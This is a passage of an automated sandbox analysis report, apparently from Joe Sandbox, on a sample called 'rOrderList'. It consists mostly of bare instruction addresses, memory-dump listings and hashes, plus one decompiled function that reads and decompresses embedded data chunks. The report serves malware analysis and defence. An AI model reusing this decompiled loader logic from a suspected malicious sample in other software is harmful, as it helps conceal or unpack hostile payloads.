                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c5b
                                                                                      0x00406c5d
                                                                                      0x00406c60
                                                                                      0x00406cd1
                                                                                      0x00406cd4
                                                                                      0x00406cd7
                                                                                      0x00406cde
                                                                                      0x00406ce8
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00406c62
                                                                                      0x00406c66
                                                                                      0x00406c69
                                                                                      0x00406c6b
                                                                                      0x00406c6e
                                                                                      0x00406c71
                                                                                      0x00406c73
                                                                                      0x00406c76
                                                                                      0x00406c78
                                                                                      0x00406c7d
                                                                                      0x00406c80
                                                                                      0x00406c83
                                                                                      0x00406c87
                                                                                      0x00406c8e
                                                                                      0x00406c91
                                                                                      0x00406c98
                                                                                      0x00406c9c
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406ca8
                                                                                      0x00406cab
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00000000
                                                                                      0x00406cad
                                                                                      0x00406cad
                                                                                      0x00406cb0
                                                                                      0x00406cb3
                                                                                      0x00406cb6
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc0
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406efa
                                                                                      0x00406efe
                                                                                      0x00406f1c
                                                                                      0x00406f1f
                                                                                      0x00406f26
                                                                                      0x00406f29
                                                                                      0x00406f2c
                                                                                      0x00406f2f
                                                                                      0x00406f32
                                                                                      0x00406f35
                                                                                      0x00406f37
                                                                                      0x00406f3e
                                                                                      0x00406f3f
                                                                                      0x00406f41
                                                                                      0x00406f44
                                                                                      0x00406f47
                                                                                      0x00406f4a
                                                                                      0x00406f4a
                                                                                      0x00406f4f
                                                                                      0x00000000
                                                                                      0x00406f4f
                                                                                      0x00406f00
                                                                                      0x00406f03
                                                                                      0x00406f06
                                                                                      0x00406f10
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fa7
                                                                                      0x00406fab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fb1
                                                                                      0x00406fb5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00406fc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407018
                                                                                      0x0040701c
                                                                                      0x00407023
                                                                                      0x00407026
                                                                                      0x00407029
                                                                                      0x00407033
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x0040701e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040703f
                                                                                      0x00407043
                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00407062
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x0040706c
                                                                                      0x00407071
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cf4
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x00000000
                                                                                      0x00407465
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1c
                                                                                      0x00406d1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d25
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5c
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d8f
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d98
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406dad
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df5
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e20
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e71
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00406e96
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00000000
                                                                                      0x00406e3d
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406eb9
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee4
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ee9
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x00000000
                                                                                      0x00407385
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x00407343
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073e7
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00407343
                                                                                      0x004072ca
                                                                                      0x004072c7

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                                                                      • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                                                                                      • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                                                                      • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 94%
                                                                                      			E00403411(intOrPtr _a4) {
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr _t11;
                                                                                      				signed int _t12;
                                                                                      				void* _t14;
                                                                                      				void* _t15;
                                                                                      				long _t16;
                                                                                      				void* _t18;
                                                                                      				intOrPtr _t19;
                                                                                      				intOrPtr _t31;
                                                                                      				long _t32;
                                                                                      				intOrPtr _t34;
                                                                                      				intOrPtr _t36;
                                                                                      				void* _t37;
                                                                                      				intOrPtr _t49;
                                                                                      
                                                                                      				_t32 =  *0x420ef4; // 0x4aa26
                                                                                      				_t34 = _t32 -  *0x40ce60 + _a4;
                                                                                      				 *0x42a270 = GetTickCount() + 0x1f4;
                                                                                      				if(_t34 <= 0) {
                                                                                      					L22:
                                                                                      					E00402FC6(1);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				E00403590( *0x420f04);
                                                                                      				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                      				 *0x420f00 = _t34;
                                                                                      				 *0x420ef0 = 0;
                                                                                      				while(1) {
                                                                                      					_t10 =  *0x420ef8; // 0x8720a
                                                                                      					_t31 = 0x4000;
                                                                                      					_t11 = _t10 -  *0x420f04;
                                                                                      					if(_t11 <= 0x4000) {
                                                                                      						_t31 = _t11;
                                                                                      					}
                                                                                      					_t12 = E0040357A(0x414ef0, _t31);
                                                                                      					if(_t12 == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *0x420f04 =  *0x420f04 + _t31;
                                                                                      					 *0x40ce80 = 0x414ef0;
                                                                                      					 *0x40ce84 = _t31;
                                                                                      					L6:
                                                                                      					L6:
                                                                                      					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
                                                                                      						_t19 =  *0x420f00; // 0x58e
                                                                                      						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                      						E00402FC6(0);
                                                                                      					}
                                                                                      					 *0x40ce88 = 0x40cef0;
                                                                                      					 *0x40ce8c = 0x8000; // executed
                                                                                      					_t14 = E00406AAC(0x40ce68); // executed
                                                                                      					if(_t14 < 0) {
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					_t36 =  *0x40ce88; // 0x40d47e
                                                                                      					_t37 = _t36 - 0x40cef0;
                                                                                      					if(_t37 == 0) {
                                                                                      						__eflags =  *0x40ce84; // 0x0
                                                                                      						if(__eflags != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _t31;
                                                                                      						if(_t31 == 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						L16:
                                                                                      						_t16 =  *0x420ef4; // 0x4aa26
                                                                                      						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                      					if(_t18 == 0) {
                                                                                      						_push(0xfffffffe);
                                                                                      						L21:
                                                                                      						_pop(_t15);
                                                                                      						return _t15;
                                                                                      					}
                                                                                      					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                      					_t49 =  *0x40ce84; // 0x0
                                                                                      					if(_t49 != 0) {
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					goto L16;
                                                                                      					L20:
                                                                                      					_push(0xfffffffd);
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				return _t12 | 0xffffffff;
                                                                                      			}

















                                                                                      0x00403414
                                                                                      0x00403421
                                                                                      0x00403434
                                                                                      0x00403439
                                                                                      0x00403569
                                                                                      0x0040356b
                                                                                      0x00000000
                                                                                      0x00403571
                                                                                      0x00403445
                                                                                      0x00403458
                                                                                      0x0040345e
                                                                                      0x00403464
                                                                                      0x0040346f
                                                                                      0x0040346f
                                                                                      0x00403474
                                                                                      0x00403479
                                                                                      0x00403481
                                                                                      0x00403483
                                                                                      0x00403483
                                                                                      0x0040348c
                                                                                      0x00403493
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403499
                                                                                      0x0040349f
                                                                                      0x004034a5
                                                                                      0x00000000
                                                                                      0x004034ab
                                                                                      0x004034b1
                                                                                      0x004034bb
                                                                                      0x004034d1
                                                                                      0x004034d6
                                                                                      0x004034db
                                                                                      0x004034e1
                                                                                      0x004034e7
                                                                                      0x004034f1
                                                                                      0x004034f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004034fa
                                                                                      0x00403500
                                                                                      0x00403502
                                                                                      0x00403525
                                                                                      0x0040352b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040352d
                                                                                      0x0040352f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403531
                                                                                      0x00403531
                                                                                      0x00403544
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403553
                                                                                      0x00000000
                                                                                      0x00403553
                                                                                      0x0040350c
                                                                                      0x00403513
                                                                                      0x00403560
                                                                                      0x00403566
                                                                                      0x00403566
                                                                                      0x00000000
                                                                                      0x00403566
                                                                                      0x00403515
                                                                                      0x0040351b
                                                                                      0x00403521
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403564
                                                                                      0x00403564
                                                                                      0x00000000
                                                                                      0x00403564
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00403425
                                                                                        • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                                                                                      • SetFilePointer.KERNELBASE(0004AA26,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer$CountTick
